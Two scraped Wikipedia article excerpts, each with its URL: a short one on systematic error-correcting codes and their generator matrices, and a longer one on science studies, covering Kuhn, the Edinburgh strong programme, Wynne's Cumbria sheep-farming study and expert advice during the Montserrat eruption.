Systematic codes have the advantage that the parity data can simply be appended to the source block, and receivers do not need to recover the original source symbols if received correctly – this is useful for example if error-correction coding is combined with a hash function for quickly determining the correctness of the received source symbols, or in cases where errors occur inerasuresand a received symbol is thus always correct. Furthermore, for engineering purposes such as synchronization and monitoring, it is desirable to get reasonable good estimates of the received source symbols without going through the lengthy decoding process which may be carried out at a remote site at a later time.[1]
Every non-systematic linear code can be transformed into a systematic code with essentially the same properties (i.e., minimum distance).[1][2]Because of the advantages cited above,linearerror-correcting codes are therefore generally implemented as systematic codes. However, for certain decoding algorithms such as sequential decoding or maximum-likelihood decoding, a non-systematic structure can increase performance in terms of undetected decoding error probability when the minimumfreedistance of the code is larger.[1][3]
For a systematiclinear code, thegenerator matrix,G{\displaystyle G}, can always be written asG=[Ik|P]{\displaystyle G=[I_{k}|P]}, whereIk{\displaystyle I_{k}}is theidentity matrixof sizek{\displaystyle k}.
|
https://en.wikipedia.org/wiki/Systematic_code
|
1800s:Martineau·Tocqueville·Marx·Spencer·Le Bon·Ward·Pareto·Tönnies·Veblen·Simmel·Durkheim·Addams·Mead·Weber·Du Bois·Mannheim·Elias
Science studiesis aninterdisciplinaryresearch area that seeks to situate scientificexpertisein broad social, historical, and philosophical contexts. It uses various methods to analyze the production, representation and reception of scientific knowledge and itsepistemicandsemioticrole.
Similarly tocultural studies, science studies are defined by the subject of their research and encompass a large range of different theoretical and methodological perspectives and practices. The interdisciplinary approach may include and borrow methods from the humanities, natural and formal sciences, fromscientometricstoethnomethodologyorcognitive science.
Science studies have a certain importance forevaluationand science policy. Overlapping with the field ofscience, technology and society, practitioners study the relationship between science and technology, and the interaction of expert and lay knowledge in the public realm.
The field started with a tendency towardnavel-gazing: it was extremely self-conscious in its genesis and applications.[1]From early concerns with scientificdiscourse, practitioners soon started to deal with the relation of scientific expertise to politics and lay people.[1]Practical examples includebioethics,bovine spongiform encephalopathy(BSE),pollution,global warming,[2][3]biomedical sciences,physical sciences,natural hazardpredictions, the (alleged) impact of the Chernobyl disaster in the UK, generation and review of science policy and risk governance and its historical and geographic contexts.[1]While staying a discipline with multiple metanarratives, the fundamental concern is about the role of the perceived expert in providing governments and local authorities with information from which they can make decisions.[1]
The approach poses various important questions about what makes an expert and how experts and their authority are to be distinguished from the lay population and interacts with the values and policy making process in liberal democratic societies.[1]
Practitioners examine the forces within and through which scientists investigate specific phenomena such as
In 1935, in a celebrated paper, the PolishsociologistcoupleMaria OssowskaandStanisław Ossowskiproposed the founding of a "science of science" to study the scientific enterprise, its practitioners, and the factors influencing their work.[10][11]Earlier, in 1923, the Polish sociologistFlorian Znanieckihad made a similar proposal.[12]
Fifty years before Znaniecki, in 1873,Aleksander Głowacki, better known in Poland by his pen name "Bolesław Prus", had delivered a public lecture – later published as a booklet –On Discoveries and Inventions, in which he said:
Until now there has been no science that describes the means for making discoveries and inventions, and the generality of people, as well as many people of learning, believe that there never will be. This is an error. Someday a science of making discoveries and inventions will exist and will render services. It will arise not all at once; first only its general outline will appear, which subsequent researchers will correct and elaborate, and which still later researchers will apply to individual branches of knowledge.[13]
It is striking that, while early 20th-century sociologist proponents of a discipline to study science and its practitioners wrote in general theoretical terms, Prus had already half a century earlier described, with many specific examples, the scope and methods of such a discipline.
Thomas Kuhn'sStructure of Scientific Revolutions(1962) increased interest both in thehistory of scienceand in science'sphilosophical underpinnings. Kuhn posited that thehistory of sciencewas less a linear succession of discoveries than a succession ofparadigmswithin thephilosophy of science. Paradigms are broader, socio-intellectual constructs that determine which types of truth claims are permissible.
Science studies seeks to identify keydichotomies– such as those between science and technology, nature and culture, theory and experiment, and science and fine art – leading to the differentiation of scientific fields and practices.
Thesociology of scientific knowledgearose at theUniversity of Edinburgh, whereDavid Bloorand his colleagues developed what has been termed "thestrong programme". It proposed that both "true" and "false" scientific theories should be treated the same way.[14]Both are informed by social factors such as cultural context and self-interest.[15]
Human knowledge, abiding as it does within human cognition, is ineluctably influenced by social factors.[16]
It proved difficult, however, to address natural-science topics with sociological methods, as was abundantly evidenced by the USscience wars.[17]Use of a deconstructive approach (as in relation to works on arts or religion) to the natural sciences risked endangering not only the "hard facts" of the natural sciences, but the objectivity and positivist tradition of sociology itself.[17]The view on scientific knowledge production as a (at least partial) social construct was not easily accepted.[1]Latour and others identified a dichotomy crucial for modernity, the division between nature (things, objects) as beingtranscendent, allowing to detect them, and society (the subject, the state) asimmanentas being artificial, constructed. The dichotomy allowed for mass production of things (technical-natural hybrids) and large-scaleglobal issuesthat endangered the distinction as such. E.g.We Have Never Been Modernasks to reconnect the social and natural worlds, returning to the pre-modern use of "thing"[18]—addressing objects as hybrids made and scrutinized by the public interaction of people, things, and concepts.[19]
Science studies scholars such asTrevor PinchandSteve Woolgarstarted already in the 1980s to involve "technology", and called their field "science, technology and society".[20]This "turn to technology" brought science studies into communication with academics in science, technology, and society programs.
More recently, a novel approach known asmapping controversieshas been gaining momentum among science studies practitioners, and was introduced as a course for students in engineering,[21][22]and architecture schools.[23]In 2002Harry Collinsand Robert Evans asked for a third wave of science studies (a pun onThe Third Wave), namely studies ofexpertiseandexperienceanswering to recent tendencies to dissolve the boundary between experts and the public.[24]
A showcase of the rather complex problems of scientific information and its interaction with lay persons isBrian Wynne's study of Sheepfarming in Cumbria after theChernobyl disaster.[1][25]He elaborated on the responses of sheep farmers inCumbria, who had been subjected to administrative restrictions because ofradioactive contamination, allegedly caused by the nuclear accident atChernobylin 1986.[25]The sheep farmers suffered economic losses, and their resistance against the imposed regulation was being deemed irrational and inadequate.[25]It turned out that the source of radioactivity was actually theSellafieldnuclear reprocessing complex; thus, the experts who were responsible for the duration of the restrictions were completely mistaken.[25]The example led to attempts to better involve local knowledge and lay-persons' experience and to assess its often highly geographically and historically defined background.[26]
Donovan et al. (2012) used social studies ofvolcanologyto investigate the generation of knowledge and expert advice on various active volcanoes.[1]It contains a survey of volcanologists carried out during 2008 and 2009 and interviews with scientists in theUK,Montserrat,ItalyandIcelandduring fieldwork seasons. Donovan et al. (2012) asked the experts about the felt purpose of volcanology and what they considered the most important eruptions in historical time. The survey tries to identify eruptions that had an influence on volcanology as a science and to assess the role of scientists in policymaking.[1]
A main focus was on the impact of the Montserrat eruption 1997. The eruption, a classical example of theblack swan theory[27]directly killed (only) 19 persons. However the outbreak had major impacts on the local society and destroyed important infrastructure, as theisland's airport.[28]About 7,000 people, or two-thirds of the population, left Montserrat; 4,000 to the United Kingdom.[29]
The Montserrat case put immense pressure on volcanologists, as their expertise suddenly became the primary driver of various public policy approaches.[1]The science studies approach provided valuable insights in that situation.[1]There were various miscommunications among scientists. Matching scientific uncertainty (typical of volcanic unrest) and the request for a single unified voice for political advice was a challenge.[1]The Montserrat Volcanologists began to use statistical elicitation models to estimate the probabilities of particular events, a rather subjective method, but allowing to synthesizing consensus and experience-based expertise step by step.[1]It involved as well local knowledge and experience.[1]
Volcanologyas a science currently faces a shift of its epistemological foundations of volcanology. The science started to involve more research into risk assessment and risk management. It requires new, integrated methodologies for knowledge collection that transcend scientific disciplinary boundaries but combine qualitative and quantitative outcomes in a structured whole.[30]
Science has become a major force in Western democratic societies, which depend on innovation and technology (compareRisk society) to address its risks.[31]Beliefs about science can be very different from those of the scientists themselves, for reasons of e.g. moral values, epistemology or political motivations. The designation of expertise as authoritative in the interaction with lay people and decision makers of all kind is nevertheless challenged in contemporary risk societies, as suggested by scholars who followUlrich Beck's theorisation. The role of expertise in contemporary democracies is an important theme for debate among science studies scholars. Some argue for a more widely distributed, pluralist understanding of expertise (Sheila JasanoffandBrian Wynne, for example), while others argue for a more nuanced understanding of the idea of expertise and its social functions (Collins and Evans, for example).[32][33]
|
https://en.wikipedia.org/wiki/Science_studies
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.